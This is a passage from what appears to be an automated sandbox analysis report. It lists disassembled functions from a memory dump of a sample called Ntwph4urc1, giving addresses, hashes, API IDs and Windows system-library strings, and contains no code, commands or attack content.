                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: kLsE
                                              • API String ID: 3446177414-3058123920
                                              • Opcode ID: 17087f5a6db877e2307f0954b28559c02499040acca90991421c1aac3cc1150b
                                              • Instruction ID: e82a7518cbc83eb54a93fb4ebd2023020d6d8e0d093caa8dc2ad3f4a5fadd3c3
                                              • Opcode Fuzzy Hash: 17087f5a6db877e2307f0954b28559c02499040acca90991421c1aac3cc1150b
                                              • Instruction Fuzzy Hash: 264136719013518AE752DFA9CD88B653B9AEB407E4F312159EE50AF0C2CB754C93C7A3
                                              Function 369552A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@
                                              • API String ID: 0-149943524
                                              • Opcode ID: 166fe6f826dd1beca6cdd3af9bf86b7adf06336d4a77257279e67581c6dfea0d
                                              • Instruction ID: 1dcbfcc2aa917245bf17373f84ee3f28e67770befb5e120fc6eef98f7a14874b
                                              • Opcode Fuzzy Hash: 166fe6f826dd1beca6cdd3af9bf86b7adf06336d4a77257279e67581c6dfea0d
                                              • Instruction Fuzzy Hash: 0832B2B89083518BE724CF15C89073EB7F5EF84784F62491EFA859B2A1E734D854CB92
                                              Function 36945702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: dc8af48a37a7d87fb547afb8b8f241b70acf7af1314443210d87a92063b0c61b
                                              • Instruction ID: 181c4f5218c53d3401cfff7eea086b959f6883c689fc5cdf7463c757d8d59b05
                                              • Opcode Fuzzy Hash: dc8af48a37a7d87fb547afb8b8f241b70acf7af1314443210d87a92063b0c61b
                                              • Instruction Fuzzy Hash: 0731F035615B16EFE752EF64CE80A8AF7A9FF44358F208025E90057A50EB70EC21CBD1
                                              Function 36955EC0 Relevance: 2.7, Strings: 1, Instructions: 1452COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ost.exe
                                              • API String ID: 0-3048828413
                                              • Opcode ID: fc53b3e39c9f8f3e9a5e5bc9bf8b395c84e2dacea0225bf2f5272827f373a3eb
                                              • Instruction ID: 6dffb3d6b3ff95038e2014f02381ccfc837202ad419d1eede733b02b71e6ffbb
                                              • Opcode Fuzzy Hash: fc53b3e39c9f8f3e9a5e5bc9bf8b395c84e2dacea0225bf2f5272827f373a3eb
                                              • Instruction Fuzzy Hash: 36C2EE74E002158FEB14CF59C890BAEB7B6FF84314F268169DA55AB361DB30ED52CB80
                                              Function 3695F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$$
                                              • API String ID: 3446177414-233714265
                                              • Opcode ID: 39e7b80ba65dc845343a020bd9d5107633c145ca580760ec88ca05f074320d77
                                              • Instruction ID: f017fc703b03a591801809341977ef7ec7d5431c63a507f3f8d1f1a3fc2be1c9
                                              • Opcode Fuzzy Hash: 39e7b80ba65dc845343a020bd9d5107633c145ca580760ec88ca05f074320d77
                                              • Instruction Fuzzy Hash: 9E61CC75E00749DBEB21CFA8C980BADB7B5FF44328F214069D6056B681DB34AD45CF92
                                              Function 369D35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                              • API String ID: 0-118005554
                                              • Opcode ID: 8da786d411ba4c825e57e745f300aa705920f5bb214a262931177a82c03faff1
                                              • Instruction ID: 0a23120c8a6554fee0139356a7528a49ea775115c08d44f2332a98f12c8e787f
                                              • Opcode Fuzzy Hash: 8da786d411ba4c825e57e745f300aa705920f5bb214a262931177a82c03faff1
                                              • Instruction Fuzzy Hash: AD31ED756087419BD301CF6AD845B1EB7E8EF8A751F91486AF940CB391EB30D805CBA2
                                              Function 3697329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .Local\$@
                                              • API String ID: 0-380025441
                                              • Opcode ID: 251fc3a9f2a179e49c501bf5eafcb2e2375e4b36ed70d7a74e8d70bdc6839746
                                              • Instruction ID: ca817721cd1662cf67fe6712e2854090b0ea6807914c759b9354ce95b8897a12
                                              • Opcode Fuzzy Hash: 251fc3a9f2a179e49c501bf5eafcb2e2375e4b36ed70d7a74e8d70bdc6839746
                                              • Instruction Fuzzy Hash: F631A1B6508304DFE320CF29C880A5BBBE8EF88694F91092EF99487211DA35DD05CBD3
                                              Function 369734B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                              Download Yara Rule
                                              Strings
                                              • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 369B2A95
                                              • RtlpInitializeAssemblyStorageMap, xrefs: 369B2A90
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                              • API String ID: 0-2653619699
                                              • Opcode ID: 496b0499f6b93a181f1111dac3357a8150011a4bb130fc1b6c21cd1e3e2c0fb5
                                              • Instruction ID: cc48ae2cf54b11977a233043a2e4c8eb981fa94126899d0e25c4096ef0b5a4b7
                                              • Opcode Fuzzy Hash: 496b0499f6b93a181f1111dac3357a8150011a4bb130fc1b6c21cd1e3e2c0fb5
                                              • Instruction Fuzzy Hash: F6115972B00215BBFB29CA498D41F6B76ADDF88B54F2480297A00EF285D675CD00DAE4
                                              Function 36A131E1 Relevance: 1.8, APIs: 1, Instructions: 281COMMON
                                              Download Yara Rule
                                              APIs
                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 36A13356
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CallFilterFunc@8
                                              • String ID:
                                              • API String ID: 4062629308-0
                                              • Opcode ID: b892c9876d01218a3b4b65668f5d66aa18beaddc6f3c762128d39f70a6431831
                                              • Instruction ID: 16b855bfa92ba3b94ce371c19c462cb054de2b0c40a7dc814b1df5205424d005
                                              • Opcode Fuzzy Hash: b892c9876d01218a3b4b65668f5d66aa18beaddc6f3c762128d39f70a6431831
                                              • Instruction Fuzzy Hash: 74C113B59017298FDB20DF1AC9846A9FBF5FB88314F5081EED94DAB250D734AA81CF40
                                              Function 36941131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: c88a4c23dc91582ba5a622ede5cf581dd67036cb877f6a3acd4b390ec2789b9b
                                              • Instruction ID: b75380e4f03bc9590e4dc688bd873feab1477af6aec2fb753ef0f44cc958ad8f
                                              • Opcode Fuzzy Hash: c88a4c23dc91582ba5a622ede5cf581dd67036cb877f6a3acd4b390ec2789b9b
                                              • Instruction Fuzzy Hash: BAB112B5A083408FD355CF29C980A6AFBF1BB89304F54496EE999D7352D731E845CB82
                                              Function 36947370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e08422da25104e8446692cc04ba98b6067a944e8dd01ba53c3b35a02c4cb1f74
                                              • Instruction ID: 8a51dca710e64fcd83b0ce361ca3f761b5cd694f1f348b8e154df82900ac552c
                                              • Opcode Fuzzy Hash: e08422da25104e8446692cc04ba98b6067a944e8dd01ba53c3b35a02c4cb1f74
                                              • Instruction Fuzzy Hash: 0DA16F75A08345CFE311DF28C884A1ABBFABF88344F21492DF5859B351E730E945CB92
                                              Function 36947703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c7f1e65f05da416c7b75d31f65c42fe8ed11f82a088b67d1105c3ed684dc1467
                                              • Instruction ID: e765a421687727a4346f91f9d8ae2d8945e275b06bd3f9f863025eef2176100f
                                              • Opcode Fuzzy Hash: c7f1e65f05da416c7b75d31f65c42fe8ed11f82a088b67d1105c3ed684dc1467
                                              • Instruction Fuzzy Hash: 62615075E04609EFEB09DF78C884A9DFBB5FF88244F24816AD519AB301DB30A951CBD1
                                              Function 3697F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d834a5c97c3d98f4e6477dadb35c5ba2a0b0c7a476414205ef95cb780003ea72
                                              • Instruction ID: 9eac7b57e74e7d18592d36d68cf45dbabb68ee888af57224786fbba6343c4b2f
                                              • Opcode Fuzzy Hash: d834a5c97c3d98f4e6477dadb35c5ba2a0b0c7a476414205ef95cb780003ea72
                                              • Instruction Fuzzy Hash: 1C4138B4D113889FDB10CFA9C880AAEBBF8FF49340F60816ED559A7211D7319A15CF60
                                              Function 3693B480 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 78e2ba8c250f9ec0f528957c8dee61c8f5da89ab99a186bf5eaab38ab4c28c4c
                                              • Instruction ID: bbdcba4d9f93d1645916531de9a1ebc67dec54c335239ffe41ed91e760d24d24
                                              • Opcode Fuzzy Hash: 78e2ba8c250f9ec0f528957c8dee61c8f5da89ab99a186bf5eaab38ab4c28c4c
                                              • Instruction Fuzzy Hash: B5312172902304AFD711CF18C880A5677B9EF853A4F71426AEE449F296DB31ED02CBE0
                                              Function 369457C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: a704e17954097818cc4a72c62e60ef91fefd151b4c344ccefff3729be9004e90
                                              • Instruction ID: 6d44ca43bf17a54d02a6d542570baf43e220ba428d7cf5320a8a8cba77180bdc
                                              • Opcode Fuzzy Hash: a704e17954097818cc4a72c62e60ef91fefd151b4c344ccefff3729be9004e90
                                              • Instruction Fuzzy Hash: 10317C35A25A05BFE746DB68CE40A89BBA6FF48248F615025E90187B51DB31EC31CBC1
                                              Function 36943616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 20922d002b0bb08bad7c65ea5b3b672d356deb93cbb943a398ff02778d9a4fef
                                              • Instruction ID: cd0ab48b1df2fa91f9c9d29014d47e826908c6b2dfc4c2d33f9a081bfd8f6c4f
                                              • Opcode Fuzzy Hash: 20922d002b0bb08bad7c65ea5b3b672d356deb93cbb943a398ff02778d9a4fef
                                              • Instruction Fuzzy Hash: ED2156355063519FE762EF26C944B16BBA8FF88714FF10458E9404B601C730EC04CB92
                                              Function 369392FF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 7298b55c9925385d9f9b211705a2ccd5b90a0e451ae02c4f1c9d3f21e9044580
                                              • Instruction ID: b4694f06fa831d2bb03404d2fbb3d3552bd504e17b825c6e811d39d1047310c4
                                              • Opcode Fuzzy Hash: 7298b55c9925385d9f9b211705a2ccd5b90a0e451ae02c4f1c9d3f21e9044580
                                              • Instruction Fuzzy Hash: 08F0FA72200340ABD731DB09CC04F9BBBEDEF84B40F280118EA4A93091E6A0A909C660
                                              Function 36A116A6 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: W
                                              • API String ID: 0-655174618
                                              • Opcode ID: 3c879bcdd362c70686aa2104eb330bf353ab972d3d400910cb6f7df117cc44a1
                                              • Instruction ID: c1e3f629ac00142386fdc493bc95e521dbe49d4c2335dbd132bd1fda318ffbce
                                              • Opcode Fuzzy Hash: 3c879bcdd362c70686aa2104eb330bf353ab972d3d400910cb6f7df117cc44a1
                                              • Instruction Fuzzy Hash: 4EA137B5E007298FEB21CF25CD80BD9BBB1AB49315F1041EAD849AB351D7349E85CF91
                                              Function 369EDEB0 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                              Download Yara Rule
                                              Strings
                                              • System Volume Information, xrefs: 369EDEBE
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: System Volume Information
                                              • API String ID: 0-764423717
                                              • Opcode ID: 21860660a2e290c0cc47683a14d37816adfa7ae55b38d46ba16cf3fa2d57137c
                                              • Instruction ID: 13368287a6150c805b2513923a83e6b3c03074727e05ce2d61f512980c4a64a0
                                              • Opcode Fuzzy Hash: 21860660a2e290c0cc47683a14d37816adfa7ae55b38d46ba16cf3fa2d57137c
                                              • Instruction Fuzzy Hash: D0616A75108315AFD712DF54CC80E6BB7E9EF98B90F00092DF9809B2A1E674DD48CB92
                                              Function 3694973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                              • Instruction ID: 5bdc14dcf6ce23ce0b7e6d8878296f8d507e172fc4588e01d8c762806f271e0a
                                              • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                              • Instruction Fuzzy Hash: 53615C75D05319AFEB12DFAAC940B9EBBF8FF84754F244169E810AB250D7749E00CB91
                                              Function 369CF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                              • Instruction ID: 4dfad568f27073189cd9d05d5767498371dfe5f67f8473c212e420c9b54651ee
                                              • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                              • Instruction Fuzzy Hash: A2516AB2514745AFEB11CF55CC40F6AB7E8FF84794F500929BA809B291DBB4ED04CBA2
                                              Function 36973EEB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                              • Instruction ID: 5514f14cd5714ca5604c487a98eabfc75da84107ed5bb9c12b4499c61616609d
                                              • Opcode Fuzzy Hash: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                              • Instruction Fuzzy Hash: F4515B716047109FD321CF65C840A6BB7E8FF88B50F00492EF9959B691E774E904CBA6
                                              Function 369FB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                              • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PreferredUILanguages
                                              • API String ID: 0-1884656846
                                              • Opcode ID: 4e5e0e88ab8e18639a8c9ef3a068ec103c19f375ddbd47ce6224bee32f61a5c9
                                              • Instruction ID: 4f7f7d28e730bd001d28f94a9d263039c1bb6b6c198af752c7bddc1886271149
                                              • Opcode Fuzzy Hash: 4e5e0e88ab8e18639a8c9ef3a068ec103c19f375ddbd47ce6224bee32f61a5c9
                                              • Instruction Fuzzy Hash: F94122B6D11218ABDF11CE95CC40BEEB3BEEF44751F22012AE804AF258D6B1DE00C7A0
                                              Function 369C97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                              Download Yara Rule
